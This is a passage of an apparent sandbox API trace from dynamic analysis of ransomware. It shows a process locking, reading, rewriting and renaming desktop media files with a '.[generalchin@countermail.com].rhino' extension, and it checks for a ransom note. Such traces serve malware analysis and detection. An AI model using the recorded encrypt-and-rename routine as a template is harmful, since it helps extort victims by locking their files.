dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0081.653] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0081.653] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0081.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0081.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7499c8 [0081.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x74c960 [0081.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7499c8 | out: hHeap=0x6d0000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7510b0 [0081.654] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c960 | out: hHeap=0x6d0000) returned 1 [0081.659] WriteFile (in: hFile=0x124, lpBuffer=0x7510c0*, nNumberOfBytesToWrite=0x4de3, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7510c0*, lpNumberOfBytesWritten=0x4af2ac*=0x4de3, lpOverlapped=0x0) returned 1 [0081.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7510b0 | out: hHeap=0x6d0000) returned 1 [0081.660] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4de3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.660] CloseHandle (hObject=0x124) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f36d0 [0081.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x703e78 [0081.661] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.661] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ZdpWNdpdNx.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\zdpwndpdnx.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ZdpWNdpdNx.mp4.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\zdpwndpdnx.mp4.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0081.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0081.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0081.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtegBM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttegbm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.663] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x18103 [0081.663] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18223, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.663] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.663] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.665] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.665] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x18103, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x18103, lpOverlapped=0x0) returned 1 [0081.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.667] GetLastError () returned 0x0 [0081.667] SetLastError (dwErrCode=0x0) [0081.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18126) returned 0x2230048 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.860] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.861] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0081.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0081.863] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0081.863] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0081.863] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.863] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x2248178 [0081.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x224b110 [0081.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2248178 | out: hHeap=0x6d0000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x744cd8 [0081.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x224b110 | out: hHeap=0x6d0000) returned 1 [0081.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2248178 [0081.864] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x744cd8 [0081.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2248178 | out: hHeap=0x6d0000) returned 1 [0081.865] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x7630c0 [0081.869] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x7798f8 [0081.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.872] WriteFile (in: hFile=0x124, lpBuffer=0x779900*, nNumberOfBytesToWrite=0x18223, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x779900*, lpNumberOfBytesWritten=0x4af2ac*=0x18223, lpOverlapped=0x0) returned 1 [0081.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7798f8 | out: hHeap=0x6d0000) returned 1 [0081.873] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18223, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.873] CloseHandle (hObject=0x124) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0081.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0081.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0081.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtegBM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttegbm.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtegBM.png.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ttegbm.png.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0081.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0081.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v77US0E_TICx8-AF-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v77us0e_ticx8-af-.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.877] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x16f96 [0081.877] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x170b6, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.878] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.878] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.880] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.880] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x16f96, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x16f96, lpOverlapped=0x0) returned 1 [0081.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.881] GetLastError () returned 0x0 [0081.881] SetLastError (dwErrCode=0x0) [0081.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16fb9) returned 0x2230048 [0081.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.882] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.882] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.883] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.883] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.896] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x170b6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.896] CloseHandle (hObject=0x124) returned 1 [0081.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0081.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v77US0E_TICx8-AF-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v77us0e_ticx8-af-.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v77US0E_TICx8-AF-.gif.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v77us0e_ticx8-af-.gif.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.897] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2df5, nNumberOfBytesToLockHigh=0x0) 